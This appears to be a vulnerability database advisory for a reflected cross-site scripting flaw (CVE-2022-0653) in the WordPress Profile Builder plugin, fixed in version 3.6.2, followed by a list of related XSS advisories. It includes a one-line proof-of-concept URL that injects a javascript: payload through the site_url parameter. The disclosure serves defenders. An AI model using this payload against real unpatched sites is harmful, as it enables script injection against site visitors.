Profile Builder < 3.6.2 – Reflected Cross-Site Scripting | CVE 2022-0653 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape the site_url parameter before outputting it back in an href attribute, leading to a Reflected Cross-Site Scripting issue

Proof of Concept

https://example.com/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(`XSS`);&message=Page%20Not%Found&site_name=404

Affects Plugins

profile-builder

Fixed in 3.6.2

profile-builder-pro

Fixed in 3.6.2

References

CVE

URL

https://www.wordfence.com/blog/2022/02/reflected-cross-site-scripting-vulnerability-patched-in-wordpress-profile-builder-plugin/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Chloe Chamberland (Wordfence)

Verified

Yes

WPVDB ID

656c368a-80bf-44c9-8382-e920b335b921

Timeline

Publicly Published

2022-02-17 (about 4 years ago)

Added

2022-02-17 (about 4 years ago)

Last Updated

2022-04-16 (about 3 years ago)

Other

Published

Title

Published

2024-05-07

Title

gee Search Plus, improved WordPress search <= 1.4.4 - Authenticated (Admin+) Stored Cross-Site Scripting

Published

2024-10-24

Title

Magazine Blocks < 1.3.18 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2021-09-09

Title

WordPress InviteBox Plugin <= 1.4.1 - Reflected Cross-Site Scripting

Published

2024-11-08

Title

Landing Page Cat – Coming Soon Page, Maintenance Page & Squeeze Pages < 1.7.7 - Reflected Cross-Site Scripting

Published

2024-09-23

Title

AnWP Football Leagues < 0.16.8 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload